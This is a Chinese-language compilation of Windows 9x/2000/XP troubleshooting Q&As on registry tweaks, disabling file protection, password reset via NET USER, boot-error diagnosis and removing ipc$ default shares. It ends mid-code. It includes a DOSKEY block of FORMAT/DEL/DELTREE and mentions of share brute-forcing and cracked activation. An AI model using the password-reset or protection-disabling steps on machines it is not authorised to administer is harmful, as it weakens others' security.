    答：可以找回Administrator的密码。①若能正常进入WinXP，则使用具有管理员权限的账户登录WinXP，然后打开“控制面板→管理工具→计算机管理”(也可以在“运行”里输入compmgmt.msc打开计算机管理)，在右边“计算机管理(本地)”的树形列表中选择“本地用户和组→用户”，在右边就可以看到当前系统里面存在的全部账户。用鼠标右键点击Administrator，选择设置密码，然后按照屏幕提示操作即可重新设置密码。②若无法正常进入WinXP，如果可以使用命令行安全模式，那么用具有管理权限的账户登录，使用NET USER命令修改密码，格式为“NET USER Administrator <输入你的新密码>”，然后回车即可。如果连命令行安全模式都无法进入，那么只有使用安装光盘选择修复了(用安装光盘启动系统，在安装程序选择菜单上选择“现在开始安装WinXP”，然后选择“修复”开始修复程序)。修复过程类似于Win98的覆盖安装，修复中会要求重新创建密码，而且已经安装的软件仍然可以继续使用。

"文件保护"的解决方法
这可能是因为你先前删除了一些文件而导致的，只要在组策略中进行一下设置即可：单击“开始→运行”，输入“gpedit.msc”，然后依次展开“计算机配置→管理模板→系统→Windows文件保护”，然后双击“设置文件保护扫描”并将其设置为“禁用”即可。
我按以下步骤关闭文件保护
1、点击开始-->运行，键入regedt32并回车；
2、找到[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]；
3、在右侧的窗格中右键单击选择New-->DWORD Value，为其命名为SFCDisable；
4、在Hexadecimal项下输入键值为ffffff9d以关闭WFP；
5、重新启动系统使所做的更改生效
但是进行到第三步时就发现右侧的窗格里没有new这个选项，进行不下去了！
描述：
    该设置可以控制是否要系统开启文件保护功能即 (SFC) 它可以监视Windows的系统文件每当系统启动时候。我们可以修改注册表自由的控制文件的扫描参数。
操作：

打开你的“注册表编辑器”。然后找到[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]这个子键。在右侧的窗口中创建一个“双字节值”并命名为“SFCScan”然后修改其值为 0 = 禁用, 1 = 启动时扫描, 2 = 扫描一次。
退出“注册表编辑器”注销或重新启动计算机，你会看到更改后的效果。
Windows XP和2000包括一种叫做WFP（Windows File Protection，Windows文件保护）的技术。把"SFCDisable"键的键值设置为"ffffff9d"可禁用WFP，而设置为"0"则可以启用它。其它一些可用的键值如下：
1 - 禁用，但是在系统启动的时候会询问你是否重新启用
2 - 只在下一次重启动的时候禁用，也不会询问你是否重新启用
4 - 启用，并且，不显示弹出窗口
ffffff9d - 完全禁用
还原受保护的Windows系统文件：在运行对话框中输入"Sfc /scannow"然后点击OK

用sfc /quiet把wfc屏蔽掉就Ok了
扫描工具SFC

    此工具会自动扫描所有受保护的系统文件，并用正确的版本取代不正确的版本。在操作系统部分损坏时，可以用来恢复系统。

    SFC的命令行及其各参数如下：
    SFC [/scannow] [/scanonce] [/scanboot] [/cancel] [/enable]
[/purgecache] [/cachesize=x] [/quiet]
    /SCANNOW：立即扫描所有设置保护的系统文件。
    /SCANONCE：下次开机时，只扫描一次所有设置保护的系统文件。
    /SCANBOOT：每次启动时，扫描所有设置保护的系统文件。
    /CANCEL：取消所有搁置中的设置保护系统文件的扫描。
    /QUIET：不提示用户，直接取代所有不正确的文件版本。
    /ENABLE：启用Windows文件保护，方便一般操作。
    /PURGECACHE：删除文件缓存，并立即扫描所有设有保护的文件系统。
    /CACHESIZE=x：设定文件缓存大小。

双击无法打开文件夹
    问：我的电脑出了问题，在资源浏览器或者我的电脑里面无法打开文件夹，双击鼠标不是打开文件夹而是进入了搜索界面，请问这是为什么？

    答：可以修改注册表来恢复，进入注册表的HKEY_CLASSES_ROOT\Directory\shell，把find删除。还有一个方法就是点“文件夹”的“高级”选项里的“新建”，在“操作”里输入“OpenNew”，接着再在“用于执行操作的应用程序”里输入“Explorer %1”就行了。如果删除find，那不用配置。如果新建OpenNew，那还需把“Opennew”设为默认。

解决无法关机问题

    1.点“开始→设置→控制面板→电源选项→高级电源管理”，如果你的机器支持高级电源管理功能，则选中“启用高级电源管理支持”；

    2.单击“开始”，并运行“regedit”，然后在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon中找到PowerdownAfterShutdown，并将值设为1；

    3.重启便可成功。

    说明：如果你的机器不支持高级电源管理，实则很不幸，只能在关闭系统显示出“现在可以安全关机”时，辛苦你手动切断电源了。

另：妙法解决Win98/Me不能关机

Win 98和Win Me都存在这样的问题：当系统用上一段时间后，关闭系统时会停留在“现在可以正常关闭系统”这个画面，只有手动按下机箱的Power键才可把系统关闭。关于这个问题，很多报刊都曾经提供了相关的解决办法，概括起来有以下几种：安装微软的关机补丁、检查有没有打开高级电源选项、检查关机音效文件是否损坏。但经笔者多次实验证明，当出现这种情况时用这些方法均不一定奏效。

笔者原来的解决方法是用Ghost将系统还原，后来摸索出了下面的方法，简单实用，现整理成文。

1.新建一个文本文件，然后将此文件改名为“win386.swp”。在接下来的操作中就是要用这个0字节的“win386.swp”文件替换掉系统产生的“win386.swp”文件。

2.依次按“开始→运行”，在“打开”对话框中输入“sfc”运行“系统文件检查器”，点选“从安装软盘提取一个文件”选项，按“浏览”按钮，把刚才新建的“win386.swp”文件选中，按“开始”按钮，此时会出现“文件提取”对话框，在“还原自”那里输入“win386.swp”文件所在的目录，如“C:\”，或者按右侧的“浏览”来选择；在“将文件保存到”那里直接输入“系统盘符\windows”(也可按右侧的“浏览”按钮选择)；两处都填好后，按下“确定”按钮，便开始将新建的“win386.swp”文件替换系统本身的“win386.swp”文件。在这个过程中会出现“是否备份原先win386.swp文件”的提示，按“跳过”按钮即可。最后当弹出要求重启机器的对话框时按“是”，重启电脑后就可正常关机了。

如果按照以上方法操作后故障没有排除，则请首先排除关机音效文件损坏等等因素。如果仍然不能解决，那么请在开机时按“F8”键，在启动菜单中选用“安全模式”启动，然后再重启一次系统就可以了。

其实，如果对DOS熟练的朋友，也可以在纯DOS中删除“win386.swp”文件。即在关闭系统时选“重新启动系统并切换到MS-DOS方式”，将系统切换到纯DOS模式下，然后进入到“windows”目录，执行“del win386.swp”，最后重启电脑即可。

无法升级更新
    问：我的系统出了问题，无法安装微软的更新程序，提示“Setup could not verify the integrity of the file Update.inf. Make sure the Cryptographic service is running on this computer”等信息，请问我该如何解决这个问题？

    答：删除C:\Windows\System32\CATROOT2 文件夹，然后重新安装更新程序。

系统无法自动保存设置
    问：我用的是Windows 2000系统，以前我每次退出系统的时候，系统都会对我的一些设置作自动保存，可是现在不知道什么原因，我退出系统的时候不再自动保存设置了，请问我该如何恢复它的自动保存功能？

    答：打开注册表表编辑器，删除HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下面的NoSaveSettings键值，然后重启系统即可。

解决系统声音不正常

    问：我的电脑为什么在玩网络游戏如(疯狂坦克，轩辕剑)中间会没声音，有时声音自己会回来，有时一直没有，退出游戏电脑还是没声音，但是重启后声音又会有。我的电脑安装的是Windows 98，磐正845PE主板，集成AC'97声卡。

    答：请重新安装最新版本的声卡驱动和DirectX。由于集成的声卡是使用CPU来处理声音，当CPU高负荷运转时，就可能无法做出响应，导致没有声音。

解决系统托盘区的图标丢失

    现象：有时当某个程序出现非法操作后，系统托盘区的输入法图标、时间控制图标、音量控制图标都不见了。你无法判断现在的输入法是什么，甚至无法再调节音量，怎么办？

    解答：我们可以通过以下的方法“找回”这些图标：

    1.输入法图标：从“控制面板”下打开“输入法属性”窗口，在“输入法”标签页下勾选“启动任务栏上的指示器”复选项即可。

    2.音量控制图标：从“控制面板”中打开“声音和音频设备属性”窗口，然后勾选“将音量图标放入任务栏”复选框就行了。

    3.任务栏丢失：打开注册表编辑器，找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer下的StuckRects子键，将它删除后重新启动计算机就可以了。

系统无法自动保存设置
    问：我用的是Windows 2000系统，以前我每次退出系统的时候，系统都会对我的一些设置作自动保存，可是现在不知道什么原因，我退出系统的时候不再自动保存设置了，请问我该如何恢复它的自动保存功能？

    答：打开注册表表编辑器，删除HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下面的NoSaveSettings键值，然后重启系统即可。

解决系统资源不足问题

第一种思路：
    1.清除“剪贴板”
    当“剪贴板”中存放的是一幅图画或大段文本时，会占用较多内存。请清除“剪贴板”中的内容，释放它占用的系统资源：单击“开始”，指向“程序”，指向“附件”，指向“系统工具”，单击“剪贴板查看程序”，然后在“编辑”菜单上，单击“删除”命令。

    2.重新启动计算机
    只退出程序，并不重新启动计算机，程序可能无法将占用的资源归还给系统。请重新启动计算机以释放系统资源。

    3.减少自动运行的程序
    如果在启动Windows时自动运行的程序太多，那么，即使重新启动计算机，也将没有足够的系统资源用于运行其他程序。设置Windows不启动过多程序：其一，单击“开始→运行”，键入“msconfig”，单击“确定”按钮，单击“启动”选卡，清除不需要自启动的程序前的复选框。其二，单击“开始→运行”，键入“sysedit”，单击“确定”按钮，删除“autoexec.bat”、“win.ini”和“config.sys”文件中不必要的自启动的程序行。然后，重新启动计算机。

    4.设置虚拟内存
    虚拟内存不足也会造成系统运行错误.可以在“系统属性”对话框中手动配置虚拟内存，把虚拟内存的默认位置转到可用空间大的其他磁盘分区。

    5.应用程序存在Bug或毁坏
    有些应用程序设计上存在Bug或者已被毁坏，运行时就可能与Windows发生冲突或争夺资源，造成系统资源不足。解决方法有二：一是升级问题软件，二是将此软件卸载，改装其他同类软件。

    6.内存优化软件
    不少的内存优化软件，如RAM Idle和Memo Kit都能够自动清空“剪贴板”、释放被关闭程序未释放的系统资源、对虚拟内存文件(Win386.swp)进行重新组织等，免除手工操作的麻烦，达到自动释放系统资源的目的。

第二种思路：
    1.禁用一部分启动项
    启动时加载过多的应用程序会使Windows因系统资源严重不足而“蓝屏”，因此我们最好运行“Msconfig”禁用一部分应用程序。或者使用Windows优化大师来代劳。

    2.设置足够的虚拟内存
    虚拟内存不足也会造成系统多任务运算错误，我们可以通过时常删除一些临时文件和交换文件对此问题加以解决，此外还可以在“系统属性”下手动配置虚拟内存，把虚拟内存的默认位置转到其他逻辑盘下。并设置得大一些。

    3.给硬盘保留足够空间
    由于Win9X运行时需要用硬盘作虚拟内存，这就要求硬盘必须保留一定的自由空间以保证程序的正常运行。一般而言，最低应保证100MB以上的空间，否则出现“蓝屏”很可能与硬盘剩余空间太小有关。另外，硬盘的碎片太多，也容易导致“蓝屏”的出现。因此，每隔一段时间进行一次碎片整理是必要的。

    4.使用内存管理软件
    剩下的就是些杂项了，诸如不用activedesktop之类浪费资源的功能。使用内存管理软件，如RAM Idle之类的。养成好习惯，暂时不用的程序就将其关闭。

解决系统资源严重不足

关于概念：
系统资源（System Resource）和内在并不是同一个概念。
微软将Windows的系统资源（堆）分为五个堆，其中User资源堆为三个，而GDI资源堆为两个。
    三个User资源堆分别是：16位的用户堆（User Heap，64KB）；32位的窗口堆（Windows Heap，2MB）；32位的用户菜单堆（User Menu Heap，2MB）。
    两个GDI资源堆分别是：16位的GDI堆（GDI Heap，64KB）；32位的GDI堆（GDI，2MB）。
    从这里的系统资源分类和大小我们应该明白，不管CPU是P4还是486，内存是8M还是1G，所有Windows的用户都拥有同样大小的系统资源（堆），用户不能自己增加或减少系统资源的大小，这是由操作系统决定的，与硬件档次没有任何关系。

问题原因：
在Windows中每运行一个程序，系统资源就会减少。有的程序会消耗大量的系统资源，即使把资源关闭，在内存中还是有一些没有的ＤＬＬ文件在运行，这样就便得系统的运行速度下降，甚至出现上述问题。

解决办法：
我们可以通过修改注册表键值的方法，使关闭软件后自动清除内存中没用的ＤＬＬ文件及时收回消耗的系统资源。打开注册表编辑器，找到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\explorer"为主键，在右过窗中单击右键，新建一个名这“AlwaysUnloadDII“的“字符串值“，然后将“AlwaysUnloadDII“的键值修改为“1“，退出注册表重新启动机器即可达到目的。

解决显示器花屏问题

    现象：一日正在CS大战，显示屏突然变得五颜六色，出现“花屏”现象，持续一段时间后键盘被锁死，只能Reset了。这种现象在第一次出现之后，就经常出现，有时候干脆就直接死机。

    解决：“花屏”现象是通过显示器表现出来的，但是导致花屏的罪魁祸首通常不是显示器。主要原因有以下两种：

    1.显卡松动，关机后拔下显卡重新安插通常就可以解决问题。

    2.系统过热，包括CPU温度过高和显卡芯片温度过高。可在机箱中相应位置安装散热风扇，或者将机箱放在通风良好的地方。

解决限制使用应用程序问题

    开机按F8进入安全模式选项，用带命令行提示的安全模式，在提示符后直接输入“mmc”(Microsoft管理控制台)，操作步骤记录如下：

首先在“文件”菜单下打开“添加/删除管理单元”(或直接用快捷键“Ctrl+M”)，在出现的对话框中单击“添加”按钮，系统就会列出一大串可添加的管理单元，选定“组策略”，再单击“添加”，会出现“欢迎使用组策略向导”窗口，点“下一步”，最后单击“完成”。关闭可添加的管理单元的列表，然后在“添加/删除管理单元”对话框里点“确定”，你会发现在“控制台根节点”窗口的左侧“控制台根节点”项目下多了一个“本地计算机”，将它展开，下面的操作就跟你启用“限制使用应用程序”时一样了。只要把“只运行许可的Windows应用程序”里的“启用”改为“未配置”就行了。最后关闭“Microsoft管理控制台”，此时会跳出一个对话框，提示保存，点“确定”，若提示无法保存，不要理它，单击“否”，关闭即可。

回到DOS命令窗口，按“Ctrl+Alt+Del”组合键，选择“关机”选项下的“重新启动”。回到正常状态下，所有的应用程序又都可以使用了。


音量为何会自动调节

《一键清理系统垃圾》

音量为何会自动调节

    问：我用Winamp听MP3时，每听完一首歌之后，音量调节(即双击小喇叭图标)的第二个控制钮“WAVE”便从刚调节的音量处降到最下面，但在玩游戏、看VCD时没出现过此种情况，这是什么原因造成的，该如何解决？

    答：运行Winmap，打开“选项→参数设置→插件→输出”菜单，选择“WaveOut输出...”插件，点击“配置”按钮，在弹出的对话框中取消“停止时复位到原始值”(去掉前面的小钩)，按“确定”按钮即可。

应用程序不能启动
    湖北读者何国明来信：我的电脑上安装的是Win2000操作系统。我以系统管理员(Administrator)的身份进入系统，然后在组策略(gpedit.msc)“用户配置→管理模板→系统”里，不小心把“只运行许可的Windows应用程序”启用了，我只加了IE进去，所以现在就只能运行IE了。运行其他的程序时都说是没有权限，无法运行！我该怎么办呢？

    A：在Win2000开始启动的时候按下F8键，选择“带命令行提示的安全模式”，然后登录。在命令行模式中输入mmc.exe，打开控制台，然后从文件中选择“添加/删除管理单元”，按添加按钮，把组策略添加到控制台中。然后选择“用户配置→管理工具→系统”，双击只运行许可的Windows应用程序，设置为“已禁用”，确定以后从文件菜单上选择“保存”，然后选择退出，最后按下“Ctrl+Alt+Del”调出“Windows安全”窗口，选择重新启动即可。

解决硬盘坏磁道问题

问：我在格式化硬盘了出现提示：Recording current bad clusters, writing outfile allocation table. Calculating free space.是不是硬盘有坏簇？请问什么是坏簇和坏磁道？如何测试硬盘坏道是物理坏道还是逻辑坏道？物理坏道可修复吗？

答：硬盘格式化后，从逻辑上可以分为磁道(盘片上的同心圆)、扇区、柱面及簇等，其中簇是保存数据的基本单位。

硬盘的坏道分为物理坏道和逻辑坏道。物理坏道就是硬盘磁片本身受到损伤而导致的坏道。逻辑坏道是指磁片并未损伤，而是由于软件故障、病毒、非正常操作等造成的坏道假象，使得正常的扇区也被标示为坏扇区。据统计，有约40%的返修硬盘实际上没有任何物理故障，而是逻辑坏道在捣乱。因此各个公司也为此推出硬盘故障诊断工具软件：如希捷的SeaTools，昆腾的DPS，IBM的Drive Fitness，三星的Self-diagnostic，西部数据的Data Lifeguard Tools，迈拓的Maxtor Diagnostics Program等，这些工具可以帮助你判断硬盘是物理坏道还是逻辑坏道，因为只有真正的物理坏道软件才会报告。硬盘出现逻辑坏道，可以用以上硬盘厂商提供的Disk management或Norton utilities2000等软件中的工具软件来处理。而物理坏道，从理论上说是无法修复的。

硬盘引导型故障分析及排除

    硬盘是存储信息的重要介质，当硬盘出现故障后，迅速找准故障原因并排除是一项极其重要的工作，这里把病毒以外的故障分析如下，供参考：
    1、HDD controller failure(硬盘驱动器控制失败)
    POST程序向驱动器发出寻道命令后，驱动器在规定时间内，没有完成操作而产生超时错误。
    C:drive faiIure(硬盘C驱动失败)
    RUN SETUP UTTLITY(运行设置功能)
    Pressto Resume(按键重新开始)
    这种故障一般是因为硬盘的类型设置参数与原格式化时所用的参数不符。由于IDE硬盘的设置参数是逻辑参数，所以多数情况下由软盘启动后，C盘能够正常读写，只是不能启动。
    2、故障信息：lnvalid Drive Specification(无效的驱动器指定)
    这是说明你欲操作的分区或是逻辑驱动器在分区表中根本没有定义。如果一个分区或是逻辑驱动器在分区表里的相应表项已不存在，那么对于操作系统来说，该分区或逻辑驱动器也就不存在了。这种故障，问题一定首先出在分区表。修复这类故障，最简单的方法是事先做好分区表的备份，比如可用Pctools9.0的Bootsafe工具，当然也可以根据BPB表内的数据重新计算分区表，但比较复杂。
    3、Ertor Loading Operation System(装载操作系统错误)
    这类故障是在读取分区引导扇区(BOOT区)出错时提示的。可能的原因有：第一、分区表指示的分区起始物理地址不正确。比如，把分区表项第三字节(起始扇区号)由1改为0，即指示该分区的起始地址为指示磁头、指定磁道上的第0个扇区(此处为物理地址，扇区应由1开始)，INT 13H读盘失败后，即报此错。第二、分区引导扇区所在磁道的磁道标志和扇区ID损坏，找不到指定扇区。第三、驱动器读电路故障。这种情况比较少见，多数是随机性读错误，因为系统引导能进行到此处，至少说明已正确地读出了一个主引导扇区。
    4、不能进入系统，如有软驱，则由A驱引导，显示：
    DRIVE NOT READY ERROR(设备未准备好)
    Insert Boot Diskette in A：(插入引导盘到A驱)
    Press any key when ready(准备好后按任意键)
    BIOSPOST结束后，如果由硬盘引导，系统将固定读取硬盘0面0道1扇区，寻找主引导程序和分区表。所以，任何用软件的方法试图避开硬盘损坏的0面0道，而能够成功引导操作系统的作法，均是不可能的！除非你改写系统BIOS中INT 19H的有关指令。
    INT 19H读取主引导扇区的失败原因有：第一，硬盘读电路故障，使读操作失败，属硬件故障；第二，0面0道磁道格式和扇区ID逻辑或物理损坏，找不到指定的扇区；第三，读盘没有出错，但读出的MBR尾标不为“55AA”，系统认为MBR不正确，这是软故障。
    5、Non－System Disk or Disk Ertor
    Replace And press any key when ready(非系统盘或磁盘错误，重新放置后按任意键)
    DOS BOOT区中的引导程序执行后发现错误，报此信息。可能的原因：驱动器复位失败、根目录区第一扇区地址出界(在544M之后)、读盘出错。此类故障大多为软件故障，如果BPB表损坏，即用软盘启动后，硬盘不能正常读写，可以用NDD修复；如果BPB表完好，只需简单的SYS C：传送系统就引导驱动器，如果失败，则得示：
    Disk Boot Failure(磁盘引导失败)
    6、NO ROM BASIC(没有固化BASIC)
    SYSTEM HALT(系统停机)
    这是相当古老的机器才会出现的提示，主引导程序的作用，就是在分区表的四个表项中找出一个激活分区(可自举分区)。如果四个表项中没有一个是激活分区，系统就不知从何处引导操作系统，只能执行INT 188H，调用固化BASIC程序，如果没有固化BASIC，就会引起死机。最简单的修复方法，是用FDISK的第二项功能：Set activeparti－tion(设置激活分区)，去指定一个可自举分区。
    7、显示“Starting MS－DOS...”然后死机
    在恢复硬盘不能引导型软故障时，值得注意的最后一点，是CONFIG.SYS和AUTOEXC.BAT中的可执行文件本身已经损坏，使得系统在执行到此文件时死机，屏幕上提示：“Starting MS－DOS……”，然后死机。这个故障非常简单，但因为没有什么故障信息，一般人很容易误判为系统文件损坏。当出现这种现象，并且确信系统文件是完好的，就可以取掉这两文件，或者在屏幕上出现以上信息，快速按下键或按住键(中断CONFIG.SYS安装和AUTOEXEC.BAT执行)，或者按下键(单步执行CONFIG.SYSJ里的命令)，找出已经损坏的文件。
    8、Invalid Partition table(无效的分区表)
    找到激活分区后，主引导程序还将判断余下三个表项的“分区引导标志”字节(首字节)是否均为0，即确认是否只有唯一的激活分区，如果有一个不为0(正常值只可能为00H和80H)，系统就报错并死机。
    9、Bad or missing Command Interpreter
    Enter cortect name or Command Interpreter(命令处理程序错误，请输入正确的文件名)
    系统在根目录和指定的目录下找不到命令处理程序，要求用户输入正确的路径和文件名，你可以在提示符下进行输入，比如：C:\DOS\COMMAND.COM。
    10、Invalid Media Type Reading Gnive X
    Abort Retry，Fail(读X驱动器介质类型无效)
    这条信息是针对DOS BOOT区中无效的BPB表而提示的。BPB表是DOS读写硬盘所用的逻辑地址，换算成物理地址的桥梁，BPB表损坏，会使DOS对磁盘的操作无从谈起。
    硬盘的引导型软故障，可以由框图所示的顺序进行逐项检查：主引导扇区中的主引导程序-分区BOOT区中的引导程序-DOS系统隐含文件-CONFIG AUTOEXEC。
    当硬盘读写没有问题(用软盘启动后可以正常读写)，只是不能引导系统，故障点一定在上框所示的四个地方，检查的顺序是主引导程序、分区引导程序、DOS系统隐含文件、CON－FIG.SYS和AUTOEXEC.BAT。对于主引导扇区中的主引导程序，可用FDISK\MBR强行写入一个正确的备份。对于分区BOOT区中的引导程序和系统隐含文件，可用SYS C:传送系统，把错误数据覆盖掉(前提是BPB表完好)。而对于硬盘读写失败的情况，可能的故障点只有两个：分区表和BPB表。如果用软盘启动后，能够出现C盘提示符，可以肯定C盘的分区表存在并且基本完好；如果C盘读写正常，BPB表可以肯定是好的。读者可根据前面介绍的方法或其他合适的工具进行恢复。
    11、17XX Hard Disk Ertor
    HDC controller fail(硬盘控制器控制失败)
    这类故障是硬件故障。POST程序向控制器发出复位命令后，在规定的时间内没有得到控制器的中断响应，可能是控制器损坏或电缆没接好。控制器失败与硬盘参数设置是否正确

加快右键菜单的响应速度
    问：前段时间我在操作电脑的过程中发现，如果单击鼠标右键，移到右键菜单的“新建”时，响应速度非常慢。而且在桌面空白处单击鼠标右键时，右键菜单的响应速度也非常慢，请问这是什么原因？

    答：很多软件安装后，都会在右键菜单中添加一些项目，如果项目太多，特别是“新建”里面的内容比较多的时候，就比较容易出现这个问题。解决办法是加快显示速度：修改注册表里面HKEY_CURRENT_USER\Control Panel\desktop的字符串MenuShowDelay的值为200或更小的数值；或使用像TweakUI那样的工具删除“新建”里面不需要的项目。

解决右键发送到问题

在“C:＼WINDOWS＼SendTo”（2000及XP为C:\Documents and Settings\用户名\SendTo）目录下，空白处右击，点选“新建/文本文档”，其后在SendTo窗口中显然会有一个0字节的记事本图标文本文件“新建文本文档.txt”:
1、邮件接收者
将这个“新建文本文档.txt”重命名为“邮件接收者.MAPIMail”！此后会出现“如果改变文件扩展名，可能会导致文件不可用。确实要更改吗？”这样一个重命名警告对话框，按“是”。
2、桌面快捷方式
将这个“新建文本文档.txt”重命名为“桌面快捷方式.DESKLINK”！此后会出现“如果改变文件扩展名，可能会导致文件不可用。确实要更改吗？”这样一个重命名警告对话框，按“是”。
3、A盘
在这里建一个A盘的快捷方式，指向A盘就可以了。

提示：前提是你必须从“文件夹选项”的“查看”选项卡下将“隐藏已知文件类型的扩展名”前的“√”去掉(即要显示出已知文件类型的扩展名)！否则“新建文本文档.txt”就成了“邮件接收者.MAPIMail.txt”，而不是“邮件接收者.MAPIMail”！！

解决桌面图标乱的方法

这是由于Windows的图标缓冲文件被破坏了，请启动“资源管理器”程序，然后进入Windows文件夹，找到一个名为ShellIconCache的文件，并将它删除。再重新启动Windows，Windows就会重建图标缓冲文件，桌面上的图标就会恢复原状。

解决自动搜索软驱

    现象：系统有时会自动去读软驱，例如每次启动系统时、打开控制面板时、关闭系统时。听着那“吱吱”的声音，心中真不是滋味。

    能不能设置一下，让系统不再去自动搜索软驱呢？

    解答：这个实现起来不难。请朋友们参照以下几种情况分别进行设置：

    (1)Windows 9x/Me：右击“我的电脑”，打开“系统属性”窗口，点击“性能/文件系统”按钮，在“软盘”标签页中取消“每次启动计算机时都搜索新的软盘驱动器(S)”复选项。

    (2)Windows 2000/XP：可以在设备管理器中将“软盘驱动器/Floppy disk drive”暂时停用，需要使用时再重新启用即可。

    (3)防病毒软件的设置：例如KVW3000、Norton AntiVirus会在启动系统时自动搜索软驱，瑞星杀毒软件会在每次关机时自动搜索软驱，只要取消这些设置就行了。

    (4)文件记忆功能：Word和Excel有一个文件记忆功能，那就是如果最后一次运行程序时访问过软盘上的文件，那么下次打开程序时仍然会自动搜索软驱。解决的办法是不要让Office的文件检索功能自动运行。

禁用指定DOS命令办法

    这种方法的基本原理是将危险的DOS命令加以限制，防止非法使用这些命令对硬盘数据进行破坏。具体方法如下：

    用“记事本”打开C盘根目录下的Autoexec文件，并在其中添加如下语句：

    C:\>DOSKEY FORMAT=Bad command or filename!

    C:\>DOSKEY del=Bad command or filename!

    C:\>DOSKEY deltree=Bad command or filename!

    然后存盘退出即可。这样再调用FORMAT、DEL、DELTREE等命令时，就会显示Bad command or filename而拒绝操作。如果在某种特殊情况下，你自己需要格式化硬盘，那该怎么办呢？你可以输入命令：C:\>DOSKEY FORMAT= (回车)，这样你就可以自由地对硬盘进行操作了。

禁止ipc$默认共享的方法

以下四种方法可以参考一下:
A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1，先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………（有几个删几个）
2，禁止建立空连接
  首先运行regedit，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]

把RestrictAnonymous（DWORD）的键值改为：00000001。
  3，禁止自动打开默认共享
 

对于server版，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerPara

meters]把AutoShareServer（DWORD）的键值改为:00000000。
对于pro版，则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把Au

toShareWks（DWORD）的键值改为:00000000。
B、另一种是关闭ipc$和默认共享依赖的服务（不推荐）
net stop lanmanserver
可能会有提示说，XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码，防止通过ipc$穷举密码。但如果你有其他漏洞，ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙，或者端口过滤。

禁止Win2000启动时读软驱
    Windows2000不仅运行在所有的台式机上，而且适用于笔记本等移动用户。 对于笔记本电脑，软驱是它们的“可移动”(removable)设备。考虑到这一点，Win2000在启动时读软驱是为了检测机器的硬件配置情况， 并不是机器“中毒”或设计缺陷。
    在Windows2000下，右击“我的电脑”-“属性”-“硬件”-“设备管理器”， 找到软盘驱动器，在它的“属性”对话框中设置为“禁用”就可以了。

禁止winxp的默认硬盘共享

禁止winxp的默认硬盘共享

编辑一个注册表文件，下面是内容：
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"autosharewks"=dword:00000000

然后保存为*.reg，执行后就可以取消win2000和winxp的默认硬盘共享了。

如果系统是服务器版本，文件内容如下：
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareServer"=dword:00000000

在注册表里的HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/Lanmanserver/Parameters/修改或添加：AutoShareServer，双字节值为0，就可以关掉盘符共享了。同时，若修改或添加AutoShareWks，双字节值为0，就可以关掉Admin共享了。

win2000也是这样设置

如何判断XP是否已激活

1、开始→运行，在弹出的对话框中输入：oobe/msoobe /a，回车后系统会弹出窗口告诉你系统是 否已经激活。

2、开始－＞所有程序－＞附件－＞系统工具－＞WINDOWS激活，如果是这样的话，就恭喜你了，已经激活。你不信，可以点最后那个“WINDOWS激活”看一下就明白了。

如果是破解/没有激活，在“开始”－＞“所有程序”顶上就看见“WINDOWS激活”了！激活后，此项就隐藏起来了。

查看激活用了哪个CD－KEY?！

激活后才想起不知道是哪一个CD－KEY激活了XP，这时你只需运行附件中的“WinXP安装CD-Key的查看小工具.exe”即可查看！

禁止WinXP文件夹自动展开

    WinXP的资源管理器里增加了一个比较人性化的功能，就是点击左侧的文件夹(或控制面板等)，如果该文件夹有子文件夹，它会自动展开此文件夹。一些用惯了老系统操作方式的用户，会嫌展开后滚动条加长，需要每次去点击展开后的“-”号。通过修改注册表即可以禁止这个功能。

    在注册表左侧展开主键[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]，把右窗口的名为“FriendlyTree”的DWORD值修改为“0”即可。返回资源管理器，点击一父目录，可以看到修改已经生效了。该主键下另一个名为“PersistBrowsers”的DWORD值是保存上次关机设置的开关状态，“1”为开，“0”为关。

禁止光盘自动运行

Win 98：
依次打开“开始→设置→控制面板→系统→设备管理”，点击“CD-ROM”，选择光驱的型号，然后选择“属性→设置”，将“自动插入通告”前的钩取消，最后点“确定”并重新启动计算机即可。

Win 2000：
与Win 98不同，在Win 2000中，禁止光盘自动运行需要通过修改注册表来实现：在“运行”中输入“regedit”，打开“注册表编辑器”，选择“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom”，将“Autorun”项的值改为0即可。在Win 2000下禁用自动播放功能的方法是：在“运行”中输入“gpedit.msc”，打开“组策略编辑器”，依次点击“本地计算机策略→计算机配制→管理模板→系统”，双击右方策略窗口中的“停用自动播放”，在打开的窗口中选择“启用”复选框，并且在“停用自动播放”下拉菜单中选择“CD-ROM 驱动器”，确定后重新启动计算机即可。

Win XP：
在Win XP里进行禁用操作比较方便。右键单击“我的电脑”里的光盘图标，选择“属性”，在弹出的窗体中选择“自动播放”选项卡，在这里用户可以针对“音乐文件”、“图片”、“视频文件”、“混合内容”和“音乐CD”五类内容设置不同的操作方式，都选用“不执行操作”即可禁用自动运行功能，“确定”后设置立即生效。

控制面板大全

    在程序运行过程中启动控制面板的各个设置功能：
var x:cardinal;
begin
{启动控制面板}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL',9);
{辅助选项 属性-键盘}
x:=winexec('rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1',9);
{辅助选项 属性-声音}
